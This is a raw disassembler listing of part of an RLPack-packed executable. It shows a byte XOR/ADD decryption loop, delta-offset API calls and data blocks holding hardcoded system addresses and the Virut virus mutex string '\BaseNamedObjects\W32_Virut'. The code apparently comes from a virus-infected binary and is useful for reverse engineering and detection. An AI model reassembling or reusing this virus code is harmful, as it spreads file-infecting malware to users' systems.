; sub_4302AC+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_430504
imul edx, 12345678h
loc_430504: ; CODE XREF: sub_4302AC+250�j
mov [eax-1], dl
call sub_42E4D8
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_430535
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_430535: ; CODE XREF: sub_4302AC+274�j
sub eax, [ebx+28h]
push dword ptr ss:loc_40397E[ebp]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_43055A
push edx
call sub_42FE80
pop edx
loc_43055A: ; CODE XREF: sub_4302AC+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_430565
mov [ebx+28h], ecx
loc_430565: ; CODE XREF: sub_4302AC+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_430576
mov [edx+8], ecx
loc_430576: ; CODE XREF: sub_4302AC+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, dword ptr ss:loc_40397A[ebp]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_4305A7
add ecx, [ebp+40106Dh]
loc_4305A7: ; CODE XREF: sub_4302AC+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_4305C9
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_4305C9
mov dh, [ebp+403430h]
loc_4305C9: ; CODE XREF: sub_4302AC+307�j
; sub_4302AC+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_4305E0
loc_4305D5: ; CODE XREF: sub_4302AC+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_4305D5
jmp short loc_4305E9
; ---------------------------------------------------------------------------
loc_4305E0: ; CODE XREF: sub_4302AC+327�j
; sub_4302AC+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_4305E0
loc_4305E9: ; CODE XREF: .RLPack:004302A7�j
; sub_4302AC+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_4302AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4305F2 proc near ; CODE XREF: sub_4302AC+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_430187
push dword ptr ss:loc_403972[ebp]
call dword ptr ss:loc_4035C4[ebp]
loc_43060B: ; CODE XREF: sub_4300B6+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, loc_40395A[ebp]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_430633: ; CODE XREF: sub_4300B6+6B�j
; sub_4300B6+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_43063F: ; CODE XREF: sub_4300B6+45�j
lea esi, loc_40384E[ebp]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_4305F2 endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 403349h, 0C10FF058h, 40158085h
dd 0C3C08500h, 0F0FFC883h, 8085C10Fh, 0C3004015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFB7EE8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 40384EB5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 4035F895h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFB2Bh, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 10h, 0B80020C2h, 30h, 3E8h, 24C200h
dd 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h, 24548B00h, 1A8B5D30h
dd 3413ED81h, 39E80040h, 61FFFFE5h, 20004C2h, 3050601h
dd 0F13DCB07h, 0FF635AA0h, 108C15h, 9001h, 3Fh dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 2 dup(0)
dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 153C7C80h
dd 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h, 5DCA7C86h
dd 11DA7C83h, 2ADE7C81h, 1D777C81h, 0B9057C80h, 0BB767C80h
dd 9E17C80h, 3DE57C83h, 3F587C86h, 27827C86h, 1CB87C81h
dd 24427C83h, 0B1C7C80h, 0B9747C81h, 9A517C80h, 0D877C80h
dd 0D4607C81h, 0D6827C90h, 0D7547C90h, 0D7697C90h, 0D7937C90h
dd 0DC557C90h, 0DCFD7C90h, 0DD907C90h, 0DEB67C90h, 0EA327C90h
dd 30C67C90h, 7C91h, 14h dup(0)
dd 380036h, 43096Ch, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BCh dup(0)
dd 79h, 0Ch dup(0)
dd 7FFD8000h, 1166h dup(0)
db 0
_RLPack ends
; Section 3. (virtual address 00036000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00035400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 436000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start